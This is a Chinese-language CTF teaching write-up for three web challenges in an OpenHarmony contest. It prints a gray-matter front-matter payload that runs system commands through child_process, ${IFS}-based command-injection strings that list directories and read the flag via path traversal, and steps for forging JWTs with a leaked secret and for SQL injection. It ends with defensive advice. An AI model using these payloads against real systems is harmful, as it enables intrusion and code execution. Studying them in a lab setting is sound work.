OpenHarmony CTF专题赛Web方向题解教学文档<\/h1>

1. Filesystem题目解析<\/h2>

1.1 漏洞发现<\/h3>

在admin.controller.ts<\/code>中发现使用了gray-matter<\/code>库处理用户的slogon<\/code><\/li>

gray-matter<\/code>库存在RCE漏洞，可通过构造特定payload执行任意命令<\/li>
<\/ul>
1.2 漏洞利用<\/h3>
const<\/span> gray<\/span> =<\/span> require<\/span>('gray-matter'<\/span>);
<\/span><\/span>var<\/span> payload<\/span> =<\/span> '---js\n((require("child_process")).execSync("whoami > RCE.txt"))\n---RCE'<\/span>;
<\/span><\/span>var<\/span> username<\/span> =<\/span> 'admin'<\/span>;
<\/span><\/span>const<\/span> profile<\/span> =<\/span> gray<\/span>.stringify<\/span>(gray<\/span>(payload<\/span>).content<\/span>, {username<\/span>:<\/span> username<\/span>});
<\/span><\/span>console<\/span>.log<\/span>(profile<\/span>)
<\/span><\/span><\/code><\/pre>1.3 JWT伪造<\/h3>

发现secret值sec_y0u_nnnnever_know<\/code>可直接用于伪造JWT<\/li>
尝试通过软链接读取\/opt\/filesystem\/adminconfig.lock<\/code>未果<\/li>
最终使用sec_y0u_nnnnever_know<\/code>成功伪造JWT<\/li>
<\/ol>
1.4 获取flag<\/h3>

服务器响应缓慢，通过ass.sh<\/code>得知flag位于\/data\/flag<\/code>目录<\/li>
最终找到flag文件<\/li>
<\/ul>
2. Layers of Compromise题目解析<\/h2>
2.1 初始访问<\/h3>

使用弱密码user\/password123<\/code>成功登录<\/li>
<\/ul>
2.2 发现隐藏资源<\/h3>

发现二级目录，点击日志会重定向到登录界面<\/li>
猜测需要特定token访问日志功能<\/li>
<\/ul>
2.3 爆破获取token<\/h3>

爆破文件路径得到\/secrettttts\/token.txt<\/code><\/li>
获取username<\/code>和auth_key<\/code><\/li>
计算MD5后序列化数据并base64编码生成auth_token<\/code><\/li>
<\/ul>
2.4 命令执行<\/h3>

构造payload闭合执行命令：";${IFS}ls${IFS}\/;#<\/code><\/li>
查找flag：";${IFS}nl${IFS}..\/..\/f*\/f*;#<\/code><\/li>
<\/ul>
3. ezAPP_And_SERVER题目解析<\/h2>
3.1 初始分析<\/h3>

获取附件hap文件<\/li>
在abc中发现XOR key和加密字符<\/li>
<\/ul>
3.2 解密过程<\/h3>

在UserList中发现硬编码的uid<\/li>
分析utils中的JWT生成逻辑<\/li>
<\/ul>
3.3 SQL注入<\/h3>

伪造JWT<\/li>
通过SQL注入获取admin的uid<\/li>
<\/ol>
{
<\/span><\/span>  "data"<\/span>: {
<\/span><\/span>    "users"<\/span>: [
<\/span><\/span>      {
<\/span><\/span>        "uuid"<\/span>: "9d5ec98c-5848-4450-9e58-9f97b6b3b7bc"<\/span>,
<\/span><\/span>        "name"<\/span>: "admin"<\/span>,
<\/span><\/span>        "phone"<\/span>: "123-456-7890"<\/span>
<\/span><\/span>      },
<\/span><\/span>      \/\/ 其他用户数据...
<\/span><\/span><\/span><\/span>    ]
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.4 获取flag<\/h3>

构造客户端逻辑生成JWT和sign<\/li>
最终获取flag：<\/li>
<\/ul>
{"flag"<\/span>:"flag{lDBRUyyVQNGHtZn7SIuu295KAS3kniFk}"<\/span>}
<\/span><\/span><\/code><\/pre>关键知识点总结<\/h2>


gray-matter库RCE漏洞<\/strong>：<\/p>

通过构造特定格式的输入可执行任意Node.js代码<\/li>
利用child_process模块执行系统命令<\/li>
<\/ul>
<\/li>

JWT安全<\/strong>：<\/p>

硬编码secret的危险性<\/li>
JWT伪造技术<\/li>
通过文件读取获取secret的方法<\/li>
<\/ul>
<\/li>

命令注入技巧<\/strong>：<\/p>

使用${IFS}<\/code>替代空格绕过过滤<\/li>
目录遍历技术<\/li>
<\/ul>
<\/li>

移动应用逆向<\/strong>：<\/p>

HAP文件分析<\/li>
XOR加密解密<\/li>
硬编码凭证的风险<\/li>
<\/ul>
<\/li>

SQL注入<\/strong>：<\/p>

通过API端点注入<\/li>
获取敏感用户信息<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

避免使用已知存在漏洞的库<\/li>
不要硬编码敏感信息<\/li>
实施严格的输入验证<\/li>
使用安全的密码存储方式<\/li>
对JWT使用强随机secret<\/li>
实施最小权限原则<\/li>
定期进行安全审计<\/li>
<\/ol>

OpenHarmony CTF专题赛Web方向题解教学文档<\/h1>

1. Filesystem题目解析<\/h2>

2. Layers of Compromise题目解析<\/h2>

3. ezAPP_And_SERVER题目解析<\/h2>

防御建议<\/h2> 避免使用已知存在漏洞的库<\/li> 不要硬编码敏感信息<\/li> 实施严格的输入验证<\/li> 使用安全的密码存储方式<\/li> 对JWT使用强随机secret<\/li> 实施最小权限原则<\/li> 定期进行安全审计<\/li> <\/ol>

防御建议<\/h2>

避免使用已知存在漏洞的库<\/li>
不要硬编码敏感信息<\/li>
实施严格的输入验证<\/li>
使用安全的密码存储方式<\/li>
对JWT使用强随机secret<\/li>
实施最小权限原则<\/li>
定期进行安全审计<\/li> <\/ol>